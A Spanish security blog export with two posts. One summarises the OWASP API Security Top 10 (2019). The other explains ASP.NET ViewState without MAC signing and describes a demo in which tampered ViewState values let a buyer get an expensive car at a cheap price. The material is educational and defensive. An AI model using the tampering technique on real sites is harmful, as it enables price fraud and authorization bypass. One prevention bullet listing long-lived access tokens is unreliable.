<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdUkUUcdeG6XM69Rxz23FV9OVt-uyDMN5hAgm8iYlmG-pGS6F_BXQcJdSWEP7XcYX2Al0nw9ejOxdaDS5Q24uT8jck9jHbb0SBB189ojGoYyjtLlQavKxtmTFp2QemIydqLVYStLzpZ0DC/s1600/Vooki6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="583" data-original-width="1434" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdUkUUcdeG6XM69Rxz23FV9OVt-uyDMN5hAgm8iYlmG-pGS6F_BXQcJdSWEP7XcYX2Al0nw9ejOxdaDS5Q24uT8jck9jHbb0SBB189ojGoYyjtLlQavKxtmTFp2QemIydqLVYStLzpZ0DC/s640/Vooki6.PNG" width="640" /></a></div>
<br />Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com019243 Congostrina, Guadalajara, Spain41.036822 -2.986212600000044441.0308335 -2.9962976000000445 41.0428105 -2.9761276000000443tag:blogger.com,1999:blog-4789894782637921835.post-35011694517739223542020-01-28T12:47:00.000+01:002020-01-28T12:49:15.472+01:00OWASP API Security Top 10<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5BfBlyNa61VmzUhFEKHfaj6L6S8wrWTNwtDRGNA6AE1afkrM6z_z6Bcqbnv8GXFbE-uBJYxvdhWrrnJq0iWFT1nAdmOUYtloUGgfhvnG76KC2LTzYjky20PhV3MfBLBhqew0Tgxl6jwoJ/s1600/APis2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="396" data-original-width="1021" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5BfBlyNa61VmzUhFEKHfaj6L6S8wrWTNwtDRGNA6AE1afkrM6z_z6Bcqbnv8GXFbE-uBJYxvdhWrrnJq0iWFT1nAdmOUYtloUGgfhvnG76KC2LTzYjky20PhV3MfBLBhqew0Tgxl6jwoJ/s640/APis2.jpg" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
By @raulrenales&@db3rn4l</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Desde hace tiempo mi compañero David Bernal y yo estamos recopilando información sobre análisis y auditoria de APIs, iniciamos el camino haciendo un post en este blog con un pequeño listado que iremos editando para ampliarlo y mejorarlo. En este artículo vamos a repasar el Top 10 de vulnerabilidades en APIs. La información esta extraída de OWASP que publico su primera lista el pasado 31 de diciembre de 2019.</div>
<div class="MsoNormal">
</div>
<a name='more'></a><br />
<br />
<div class="MsoNormal">
La creación de este listado responde principalmente a dos razones:</div>
<div class="MsoNormal">
</div>
<ul>
<li>El papel crucial que están desempeñando las APIs en la seguridad de las aplicaciones.</li>
<li>Aparición de problemas específicos de API que se deben tener en cuenta.</li>
</ul>
<br />
<div class="MsoNormal">
<br /></div>
<h4>
Top 10 Vulnerabilidades de API 2019</h4>
<div class="MsoNormal">
<b>API1:2019 — Broken object level authorization (IDOR)</b></div>
<div class="MsoNormal">
</div>
<ul>
<li>Descripción: Un atacante sustituye un valor (ID) en la llamada de la API, el atacante recibe información que podría no estar autorizado para ver.</li>
<li>Prevención: </li>
<ul>
<li>Implementar verificación de autorización para entregar la información a las personas adecuadas.</li>
<li>Verificar todos los valores que provienen de los usuarios y que vienen de zonas no confiables.</li>
<li>Chequear la autorización de cada una de las peticiones.</li>
<li>No utilizar patrones predecibles en los Identificadores (Ej. ID=adfi5df8s)</li>
</ul>
</ul>
<br />
<div class="MsoNormal">
<b>API2:2019 — Broken authentication</b></div>
<div class="MsoNormal">
</div>
<ul>
<li>Descripción: Apis desprotegidas o con autenticaciones débiles. Credenciales incluidas en las urls. Falta de validación de Token de acceso.</li>
<li>Prevención: </li>
<ul>
<li>Verificar los procesos de autenticación en la API.</li>
<li>APIs auxiliares para recordatorios de contraseñas tratarse con la misma diligencia que las demás.</li>
<li>Tokens de acceso de larga duración.</li>
<li>Políticas de bloqueo para casos de intentos reiterados.</li>
</ul>
</ul>
<br />
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>API3:2019 — Excessive data exposure</b></div>
<div class="MsoNormal">
</div>
<ul>
<li>Descripción: Entregar más datos que los necesarios confiando que el cliente haga el filtrado en la capa web, si el atacante usa directamente la API obtiene toda la información.</li>
<li>Prevención: </li>
<ul>
<li>No confiar en el cliente para filtrar los datos</li>
<li>Entregar estrictamente los datos necesarios</li>
<li>Evaluar y justificar el uso de datos de carácter personal amparados por la ley.</li>
<li>Revisar que no existan fugas accidentales de datos o excepciones.</li>
</ul>
</ul>
<br />
<div class="MsoNormal">
<b>API4:2019 — Lack of resources and rate limiting</b></div>
<div class="MsoNormal">
</div>
<ul>
<li>Descripción: Se trata de APIs que no controlan o limitan una cantidad excesiva de llamadas, esto puede provocar denegación de servicio y facilitan los ataques de fuerza bruta.</li>
<li>Prevención: </li>
<ul>
<li>Definir limitaciones en peticiones y carga de las mismas.</li>
<li>Chequear los ratios de compresión.</li>
</ul>
</ul>
<br />
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>API5:2019 — Broken function level authorization</b></div>
<div class="MsoNormal">
</div>
<ul>
<li>Descripción: APIs con diferentes roles de administración y usuario que contienen métodos ocultos de administración que pueden ser descubiertos y ser utilizados directamente por los usuarios.</li>
<li>Prevención:</li>
<ul>
<li>No utilizar el cliente para otorgar el acceso a las funciones de administrador.</li>
<li>Denegar todo acceso por defecto.</li>
<li>Validar que cada nivel de usuario puede usar los métodos adecuados.</li>
<li>Buenas baterías de pruebas y validación en estos aspectos.</li>
</ul>
</ul>
<br />
<div class="MsoNormal">
<b>API6:2019 — Mass assignment</b></div>
<div class="MsoNormal">
</div>
<ul>
<li>Descripción: Se da en la entrada de datos proporcionada por el cliente que pueden modificar propiedades de los objetos o proporcionar propiedades adicionales en sus solicitudes. El atacante podría adivinar o investigar propiedades ocultas de los objetos almacenados en backend para influir en ellas.</li>
<li>Prevención:</li>
<ul>
<li>No enlazar directamente datos entrantes y objetos internos</li>
<li>Utilizar la propiedad readOnly, estableciéndola a true, para las propiedades que puedan obtenerse desde la API, no permitiendo en ningún momento que pueda modificar.</li>
<li>Definir bueno esquemas, tipos y patrones que se aceptaran en las peticiones.</li>
</ul>
</ul>
<br />
<div class="MsoNormal">
<b>API7:2019 — Security misconfiguration</b></div>
<div class="MsoNormal">
</div>
<ul>
<li>Descripción: Sistemas sin actualizar, archivos y directorios desprotegidos, TLS mal configurado, Falta de políticas CORS o encabezados de seguridad, mensajes de error mal manejados, funciones innecesarias habilitadas.</li>
<li>Prevención:</li>
<ul>
<li>Establezca procesos repetibles de endurecimiento y parcheo.</li>
<li>Automatizar fallas de configuración de localización.</li>
<li>Desactiva las funciones innecesarias.</li>
<li>Restringir el acceso administrativo.</li>
<li>Defina y aplique todas las salidas, incluidos los errores.</li>
</ul>
</ul>
<br />
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>API8:2019 — Injection</b></div>
<div class="MsoNormal">
</div>
<ul>
<li>Descripción: Un atacante podría utilizar los parámetros de entrada para inyectar código que influya en las peticiones SQL, NoSql, LDAP, OS u otros que se realizan en el backend de la API.</li>
<li>Prevención:</li>
<ul>
<li>Validar cualquier valor de entrada a la API</li>
<li>Definir los tipos de datos de entrada</li>
<li>Usar listas blancas o negras</li>
<li>Sanitizar los parámetros</li>
<li>Verificar las salidas de la API para evitar fuga de datos</li>
</ul>
</ul>
<br />
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>API9:2019 — Improper assets management</b></div>
<div class="MsoNormal">
</div>
<ul>
<li>Descripción: Un atacante puede encontrar una versión de pruebas que no debería estar en producción. Encontrar fallos de seguridad en esas apis de prueba.</li>
<li>Prevención:</li>
<ul>
<li>Mantener un inventario adecuado de los recursos utilizados</li>
<li>Limitar los accesos a los servicios y comprobar que solo son accesibles al público los que la organización quiere.</li>
<li>Separar los entornos de producción, preproducción y desarrollo.</li>
<li>Retirar versiones anteriores</li>
<li>Implementar autenticación estricta, redireccionamientos, CORS …</li>
</ul>
</ul>
<br />
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>API10:2019 — Insufficient logging and monitoring </b></div>
<div class="MsoNormal">
</div>
<ul>
<li>Descripción: Ausencia de sistemas de monitorización de la API. Ausencia de logs que registren la actividad de la API. Por lo tanto ausencia de capacidad para generar alertas adecuadas que desenmascaren actividades ilícitas.</li>
<li>Prevención:</li>
<ul>
<li>Registre intentos fallidos, acceso denegado, fallas de validación de entrada o cualquier falla en las verificaciones de políticas de seguridad.</li>
<li>Asegúrese de que los registros estén formateados para que otras herramientas también puedan consumirlos.</li>
<li>Proteja los registros como información altamente confidencial.</li>
<li>Incluya suficientes detalles para identificar a los atacantes.</li>
<li>Evite tener datos confidenciales en los registros; si necesita la información para fines de depuración, elimínela parcialmente.</li>
<li>Integre con SIEM y otros paneles, herramientas de monitoreo y alerta.</li>
</ul>
</ul>
<br />Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com019171 Cabanillas del Campo, Guadalajara, Spain40.6378501 -3.23071129999993940.6137506 -3.2710502999999389 40.6619496 -3.1903722999999391tag:blogger.com,1999:blog-4789894782637921835.post-29036691711538903112019-12-25T23:04:00.000+01:002019-12-25T23:04:37.835+01:00Viewstate without MAC Signature<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcw4A54zrH7T2Duw8QrTU729POMVDL8wqSStJrTUvOo5IUbPmoRKIWlXaijqzceLhTbaxc3izM2iHhycwgVbKgpZnMxtBOOjgvTZf2mpVb_Mkjw7EVK03p6vJZj4UyN1JyrFo9iVpJZOO7/s1600/ViewState.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="350" data-original-width="1001" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcw4A54zrH7T2Duw8QrTU729POMVDL8wqSStJrTUvOo5IUbPmoRKIWlXaijqzceLhTbaxc3izM2iHhycwgVbKgpZnMxtBOOjgvTZf2mpVb_Mkjw7EVK03p6vJZj4UyN1JyrFo9iVpJZOO7/s640/ViewState.jpg" width="640" /></a></div>
<div class="MsoNormal">
<!--[if gte vml 1]><v:shapetype
id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t"
path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
<v:stroke joinstyle="miter"/>
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0"/>
<v:f eqn="sum @0 1 0"/>
<v:f eqn="sum 0 0 @1"/>
<v:f eqn="prod @2 1 2"/>
<v:f eqn="prod @3 21600 pixelWidth"/>
<v:f eqn="prod @3 21600 pixelHeight"/>
<v:f eqn="sum @0 0 1"/>
<v:f eqn="prod @6 1 2"/>
<v:f eqn="prod @7 21600 pixelWidth"/>
<v:f eqn="sum @8 21600 0"/>
<v:f eqn="prod @7 21600 pixelHeight"/>
<v:f eqn="sum @10 21600 0"/>
</v:formulas>
<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Imagen_x0020_1" o:spid="_x0000_i1031" type="#_x0000_t75"
style='width:425.25pt;height:148.5pt;visibility:visible;mso-wrap-style:square'
o:bordertopcolor="yellow pure" o:borderleftcolor="yellow pure"
o:borderbottomcolor="yellow pure" o:borderrightcolor="yellow pure">
<v:imagedata src="file:///C:/Users/MrRobot/AppData/Local/Temp/msohtmlclip1/01/clip_image001.jpg"
o:title=""/>
<w:bordertop type="single" width="6"/>
<w:borderleft type="single" width="6"/>
<w:borderbottom type="single" width="6"/>
<w:borderright type="single" width="6"/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--><o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
by @raulrenales</div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Si sois usuarios de ZAP y últimamente habéis trabajado en el
pentest de aplicaciones web basada en .NET es muy probable que os hayáis topado
con esta vulnerabilidad, <b>Viewstate without MAC Signature</b>. En este post
vamos a intentar hablar sobre ella y sobre las opciones de explotación que esta
vulnerabilidad tiene, intentando aprender un poco como funciona el concepto de
viewstate.</div>
<a name='more'></a><br /><o:p></o:p><br />
<h3>
Comencemos por lo más sencillo ¿Qué es viewstate?</h3>
<h2>
<o:p></o:p></h2>
<div class="MsoNormal" style="text-align: justify;">
Para los que conozcáis un poco el protocolo HTTP no os
descubrimos nada si os contamos que una pagina web carece de información de
estado debido al diseño básico del protocolo. Esto implica que la web no
almacena información de conexiones anteriores, esto conlleva a que cada
petición que se realice haga regenerar la pagina desde cero, sin “guardar” las
informaciones que se habían introducido anteriormente en esta misma pagina web
por parte del usuario. Simplemente el diseño de HTTP no fue pensado para servir
las complejas paginas que tenemos hoy en día.<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
Debido a este problema pronto aparecieron diferentes maneras
de mantener la información de estado como Cookies, Campos ocultos,
ControlState, SessionState, Cache …. Una de ellas es nuestra Viewstate.<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<h3>
¿Cómo funciona el viewstate?</h3>
<h2>
<o:p></o:p></h2>
<div class="MsoNormal" style="text-align: justify;">
Lo primero que debemos de entender es que ViewState tiene
dos estructuras diferentes dependiendo del lado en el que nos encontremos, lado
del cliente o del servidor.<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<b>En el lado del cliente el viewstate</b> esta representado
por un campo oculto que contiene un valor codificado en Base64. Este valor
codificado recopila información de los controles que muestra la web, a mayor
numero de controles mayor tamaño de la cadena codificada.<o:p></o:p></div>
<div>
<br /></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjM1KuvWZ4UW8C70EICke72AW1bxDoq7AgYy5g6Vd6Iwk-UPMr1a1tC8XC4Ur9aBDE-lxYJDzo1dp3zDYThjdPAU-lQQY19snwsvFvQS9mw8Bma_sCs8P8HyAxQhzTkGGzgQU_S-rRNfS0/s1600/ViewState2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="241" data-original-width="864" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjM1KuvWZ4UW8C70EICke72AW1bxDoq7AgYy5g6Vd6Iwk-UPMr1a1tC8XC4Ur9aBDE-lxYJDzo1dp3zDYThjdPAU-lQQY19snwsvFvQS9mw8Bma_sCs8P8HyAxQhzTkGGzgQU_S-rRNfS0/s640/ViewState2.JPG" width="640" /></a><br /><div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b>En el lado del servidor viewstate</b> no es más que un
diccionario del tipo Clave-Valor donde se almacena la información del estado y
un <b>Hash que es utilizado para identificar si alguien ha manipulado el
viewstate</b> en algún momento.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<o:p><br /></o:p></div>
<h3>
Tipos de ataques contra la viewstate</h3>
<h2>
<o:p></o:p></h2>
<div class="MsoNormal">
Un viewstate no firmado podría habilitar diferentes ataques
los cuales pasamos a enumerar:<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoListParagraphCxSpFirst" style="text-align: justify; text-indent: -18pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;"> </span></span><b>Suplantación de contenido:</b> Este caso se
da cuando modificamos el valor del viewstate. La posibilidad de suplantación de
contenido para una página HTML surge del propósito principal de ViewState, es
decir, preservar la página y controlar los valores. Si los datos de
ViewState colocados en el cuerpo de respuesta HTTP no se filtran correctamente,
se produce suplantación de contenido. Este problema se presenta con las
siguientes configuraciones vulnerables:<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";">o<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;">
</span></span><!--[endif]-->EnableViewStateMac = false<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";">o<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;">
</span></span><!--[endif]-->ViewStateEncryptionMode = nunca | auto<o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";">o<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;">
</span></span><!--[endif]-->ViewStateUserKey = EMPTY<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoListParagraphCxSpFirst" style="text-align: justify; text-indent: -18pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;"> </span></span><b>Fuga de información:</b> Si el desarrollador
no encripta el parámetro VIEWSTATE, un atacante puede decodificar la estructura
VIEWSTATE y extraer datos confidenciales. Si el desarrollador no verifica
la integridad de los datos (MAC), un atacante puede cambiar los parámetros que
pueden influir en la lógica de la aplicación web, lo que facilita la omisión de
autenticación, la omisión de autorización y el abuso de la funcionalidad. Configuración
vulnerable:<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";">o<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;">
</span></span><!--[endif]-->ViewStateEncryptionMode = nunca | auto<o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";">o<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;">
</span></span><!--[endif]-->EnableViewStateMac = falso | verdadero<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoListParagraphCxSpFirst" style="text-align: justify; text-indent: -18pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;"> </span></span><b>Facilitador de otras vulnerabilidades:</b> Todas
las demás vulnerabilidades comunes para aplicaciones web, como la inyección de
SQL, OS Commanding, así como otras vulnerabilidades de tipos como la
Explotación de código, la Divulgación de información, etc., pueden y deben
verificarse tanto en variables de la estructura ViewState como en otras
variables enviadas por GET / POST / COOKIES. Configuración vulnerable:<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l1 level2 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";">o<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;">
</span></span><!--[endif]-->EnableViewStateMac = false<o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l1 level2 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";">o<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;">
</span></span><!--[endif]-->ViewStateEncryptionMode = nunca | auto<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<o:p><br /></o:p></div>
<h3>
Un ejemplo practico</h3>
<h2>
<o:p></o:p></h2>
<div class="MsoNormal" style="text-align: justify;">
Supongamos que nos hacen responsables de un proyecto en el
que tengamos que diseñar un pequeño concesionario de coches. Básicamente
tenemos una serie de vehículos que están agrupados por categorías y que ponemos
a disposición de los visitantes para que realicen una compra, la vista es esta:<o:p></o:p></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM0u6CiqJPNe3KAALcgDBhUUgdlMByig-aVDT57pOyowUM7S3-jGUWTjnBI4Xs85NVZH9prcJgMDiqrlowBWBkrKQvdJBHL3PxnmUXEP_44GZOs-EELwQtth-7s0MrkAUv4tYikL2ZgoXg/s1600/ViewState3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="487" data-original-width="863" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM0u6CiqJPNe3KAALcgDBhUUgdlMByig-aVDT57pOyowUM7S3-jGUWTjnBI4Xs85NVZH9prcJgMDiqrlowBWBkrKQvdJBHL3PxnmUXEP_44GZOs-EELwQtth-7s0MrkAUv4tYikL2ZgoXg/s640/ViewState3.JPG" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<br /></div>
<br /><div class="MsoNormal" style="text-align: justify;">
Como vemos en la imagen, vamos presentando vehículos a los
visitantes según la categoría. Esta mínima actividad estará generando un
viewstate en nuestra página con los valores vistos en el Gridview.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0zWQBqbgJAQT9ehCLkPfPeIqw7dkgUMUDuBXA9bmhaeZgTnK9qhJkyINm0HnBkxcgPQy3nWKPceyjqoW7bY8s21HlbmYhwwQQKucsJ_QHGxLNmAhY1733NPpmdYOWFhzfTGKRKjAlUfW9/s1600/ViewState4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="127" data-original-width="861" height="94" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0zWQBqbgJAQT9ehCLkPfPeIqw7dkgUMUDuBXA9bmhaeZgTnK9qhJkyINm0HnBkxcgPQy3nWKPceyjqoW7bY8s21HlbmYhwwQQKucsJ_QHGxLNmAhY1733NPpmdYOWFhzfTGKRKjAlUfW9/s640/ViewState4.JPG" width="640" /></a></div>
<div>
<br /></div>
<br /><div class="MsoNormal">
Veamos otro ejemplo de coche que vendemos en el
concesionario:<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZzVlYLjaxUTyzQxLAOQgfQa0AHv1sK3A8QUZrQ2Vx3omUidYzdW7FqEHsddFhPou07K0KsEn8BQPs0zBvdjV1Ocmo7zSClCoLL7c7cQlPZ81NB6rexCcJt3xeblqIgA5lJ0Z-f6C2p__J/s1600/ViewState5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="515" data-original-width="846" height="388" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZzVlYLjaxUTyzQxLAOQgfQa0AHv1sK3A8QUZrQ2Vx3omUidYzdW7FqEHsddFhPou07K0KsEn8BQPs0zBvdjV1Ocmo7zSClCoLL7c7cQlPZ81NB6rexCcJt3xeblqIgA5lJ0Z-f6C2p__J/s640/ViewState5.JPG" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<!--[if gte vml 1]><v:shape
id="Imagen_x0020_5" o:spid="_x0000_i1027" type="#_x0000_t75" style='width:415.5pt;
height:249.75pt;visibility:visible;mso-wrap-style:square' o:bordertopcolor="yellow pure"
o:borderleftcolor="yellow pure" o:borderbottomcolor="yellow pure"
o:borderrightcolor="yellow pure">
<v:imagedata src="file:///C:/Users/MrRobot/AppData/Local/Temp/msohtmlclip1/01/clip_image009.png"
o:title=""/>
<w:bordertop type="single" width="6"/>
<w:borderleft type="single" width="6"/>
<w:borderbottom type="single" width="6"/>
<w:borderright type="single" width="6"/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--><o:p></o:p></div>
<div class="MsoNormal">
Y también observamos como el viewstate es completamente
diferente:<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVwBnss9jHYZh244XLMO5m133_ackGYM6dbWIqRp70mFYfWv_CuytUYAxFFJTm4Ayn2fYWQ2Q4ocsNK2X2ouUjEHhDEm7HmiwaZIkcg7Vah-iPDXyli1L_vjdyBtfzivJsY051e2qBSEi_/s1600/ViewState6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="118" data-original-width="860" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVwBnss9jHYZh244XLMO5m133_ackGYM6dbWIqRp70mFYfWv_CuytUYAxFFJTm4Ayn2fYWQ2Q4ocsNK2X2ouUjEHhDEm7HmiwaZIkcg7Vah-iPDXyli1L_vjdyBtfzivJsY051e2qBSEi_/s640/ViewState6.JPG" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<!--[if gte vml 1]><v:shape
id="Imagen_x0020_8" o:spid="_x0000_i1026" type="#_x0000_t75" style='width:425.25pt;
height:59.25pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="file:///C:/Users/MrRobot/AppData/Local/Temp/msohtmlclip1/01/clip_image011.png"
o:title=""/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--><o:p></o:p></div>
<div class="MsoNormal">
Mediante Burp cuando estamos viendo vehículos de categoría 2,
ósea el formula 1 caro, vamos a alterar el _ViewState y el _EventValidation con
los obtenidos en el ejemplo 1 del coche mas barato, y el resultado será la
compra de un vehículo de categoría 2 a precio de categoría 1.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPHslQvPP08SOGu8bv10yeivPTzTQ-MjAat0EF3sqDpBDBik-HO_2AdoKKy5l6wlLOyfOJIZctE_zLmauGCcyMcYLaKbaBnB48ccL-nzx3zYK3Fxp9gpjL055ajp9dDH02yfNY9WzoaKyK/s1600/ViewState7.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="514" data-original-width="869" height="378" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPHslQvPP08SOGu8bv10yeivPTzTQ-MjAat0EF3sqDpBDBik-HO_2AdoKKy5l6wlLOyfOJIZctE_zLmauGCcyMcYLaKbaBnB48ccL-nzx3zYK3Fxp9gpjL055ajp9dDH02yfNY9WzoaKyK/s640/ViewState7.JPG" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<!--[if gte vml 1]><v:shape
id="Imagen_x0020_9" o:spid="_x0000_i1025" type="#_x0000_t75" style='width:425.25pt;
height:248.25pt;visibility:visible;mso-wrap-style:square' o:bordertopcolor="yellow pure"
o:borderleftcolor="yellow pure" o:borderbottomcolor="yellow pure"
o:borderrightcolor="yellow pure">
<v:imagedata src="file:///C:/Users/MrRobot/AppData/Local/Temp/msohtmlclip1/01/clip_image013.png"
o:title=""/>
<w:bordertop type="single" width="6"/>
<w:borderleft type="single" width="6"/>
<w:borderbottom type="single" width="6"/>
<w:borderright type="single" width="6"/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--><o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<h3>
Soluciones, o porque nunca deshabilitar la firma MAC.</h3>
<h2>
<o:p></o:p></h2>
<div class="MsoNormal" style="text-align: justify;">
Para ser claros, no hay motivo
alguno para tener deshabilitado esta propiedad, no existen excepciones ni
buenas razones. De hecho, la misma gente de Microsoft ha iniciado el camino
para que esta propiedad no sea configurable y de esta manera no pueda ponerse a
false en siguientes versiones.<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
Básicamente se debe habilitar la propiedad enableViewStateMac
en la web.config:<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
